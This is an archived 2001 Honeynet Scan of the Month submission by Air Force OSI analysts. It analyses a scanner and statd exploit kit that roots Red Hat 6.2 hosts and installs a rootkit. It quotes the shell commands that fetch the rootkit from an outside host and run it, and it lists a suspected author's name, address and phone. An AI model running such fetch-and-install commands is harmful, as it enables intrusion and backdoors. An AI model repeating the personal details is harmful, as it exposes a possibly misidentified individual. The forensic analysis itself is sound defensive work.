From kkenda11@yahoo.com Fri Mar 23 10:14:46 2001 Date: Wed, 21 Mar 2001 16:00:39 -0800 (PST) From: Kris Kendall Reply-To: kkenda11@pacbell.net To: project@honeynet.org Subject: Scan of the Month -- March From: Kris Kendall (kendalk@ogn.af.mil) and Jesse Kornblum (kornblj@ogn.af.mil) US Air Force Office of Special Investigations 1. What is the blackhat attempting to do with his command line syntax? The blackhat is attempting to scan and attack several IP ranges for the vulnerabilities described in (2) below. A lookup for who has registered each of these IP blocks can be found here: http://ipindex.dragonstar.net/index.html. The networks being scanned are: 216.210.x.x, 200.120.x.x, 64.120.x.x, 216.200.x.x, 200.120.x.x, 63.1.x.x, 216.10.x.x, 210.120.x.x, 64.1.x.x, 216.1.x.x, 194.1.x.x, 216.1.x.x, 210.128.x.x, 24.1.x.x, and 12.20.x.x. 2. What does the tool accomplish? The tool scans for Redhat Linux 6.2 boxes that are vulnerable to the statd buffer overflow, and exploits the vulnerability to install a rootkit on these vulnerable hosts. 3. How does the tool work? The blackhat starts the process by invoking "luckgo [ ]". The blackhat can specify a class A, B, or C network to scan. luckgo is a shell (/bin/sh) script. If luckscan-a and luckstatdx do not exist yet, luckgo attempts to compile them. luckgo then creates scan.log (if it doesn't exist) and calls luckscan-a to do the scanning. It is interesting to note that although scan.log is created by luckgo, it is never written to. Perhaps this was a coding error on the part of whoever wrote the luckgo script. luckscan-a attempts to open connections to port 111 on all hosts (1000 at a time) in the network being scanned. For each successful connection luckscan calls luckstatdx to attempt the statd buffer overflow on that host. luckstatdx is called with the parameters "-d 0 ". The "-d 0" part of this parameter list tells the statd exploit to use the exploit code for "Redhat 6.2 (nfs-utils-0.1.6.2)". So, this tools targets Redhat 6.2 victims. If the buffer overflow is successful in spawning a root shell, the following commands are executed on the victim host: cd / uname -a id wget -nd http://www.becys.org/xzibit.tar.gz tar -zxvf xzibit.tar.gz; cd lamerk ./install cd / rm -rf lamerk xzibit.tar.gz These commands retrieve a rootkit from the attacker's web site and install it. The rootkit installs trojanized versions of ifconfig, netstat, ps, and top. The configuration files for the rootkit are installed in "/dev/caca", "/dev/dsx", and "/dev/ida/.inet". It also installs LinSniffer, a packet sniffer that listens to eth0 looking for passwords, writing output to a file tcp.log. The rootkit then adds the sniffer to the system startup files and two backdoors, one for SSH access on port 6969, the other a cgi program that allows remote users to execute commands on the systems. The md5 hash of the backdoor password for sshdu is probably: f35ccf7b5f691399495d84eadd656df7. This hash does not match any word from /usr/dict/words. The install script then sends e-mail to becys@becys.org containing the IP addresses, hostname and "uname -a" output for the newly rooted box. 4. Is this tool a worm, or would you classify it as something else? This is not a worm as it does not have any power to self-replicate. Rather, the tool is a scanner that installs a rootkit on every vulnerable host it encounters. The rootkit sniffs traffic looking for passwords and opens multiple backdoors for the attacker (and other users) to access the system. 5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified? This tool is composed of slightly modified versions of previous tools. The exploit tool is based on the statdx.c exploit originally written by ron1n (shellcode@hotmail.com), dated August 3, 2000 and posted to Bugtraq on August 5, 2000 [2]. The original statdx.c, available at [1], has been modified such that when a vulnerable host is found, the program installs a rootkit on the vulnerable host as described in (3) above. The scanner (luckscan-a.c) is based on pscan-a.c, a privately released port scanner by Volatile. A copy of the C code for the original pscan-a can be found at [3]. The lamerk rootkit installed on the victims is similar to many other linux rootkits. The configuration files have the same format as the configuration files for lrk, t0rnkit, and Ambient's Rootkit for Linux (ARK) [4]. Bonus Question: What information can you obtain about who is using or created the tool? The tool mentions the e-mail address becys@becys.org and also retrieves the rootkit from this domain as well. The domain becys.org was registered via Bulkregister.com Inc on September 11th, 2000. The domain is registered to bSoft, 1 Hensel Dr. Apt #Z1F, College Station, TX, 77840 USA. The administrative contact is listed as Qian Wang, becys@yahoo.com, at the same address, phone 979-862-9233. Because DNS registration information can easily be falsified, the above should be taken with a grain of salt. The becys@becys.org e-mail is handled by host3.websitesource.com. This domain is registered to WebSiteSource Inc based in Houston, TX. The Yahoo! profile for becys, which again, which is trivial to falsify, says that becys' real name is Dimitru Liviu Mihai from Targoviste, age 18, a single male student. His favorite hobby, latest news, and favorite quote, are all listed as "sex". Targoviste is a city in Romania. References: 1. http://packetstorm.securify.com/0008-exploits/statdx.c 2. http://archives.neohapsis.com/archives/bugtraq/2000-08/0013.html 3. http://www.self-evident.com/security/scanners/pscan-a.c.gz 4. http://packetstorm.securify.com/UNIX/penetration/rootkits/ __________________________________________________ Do You Yahoo!? Get email at your own domain with Yahoo! Mail. http://personal.mail.yahoo.com/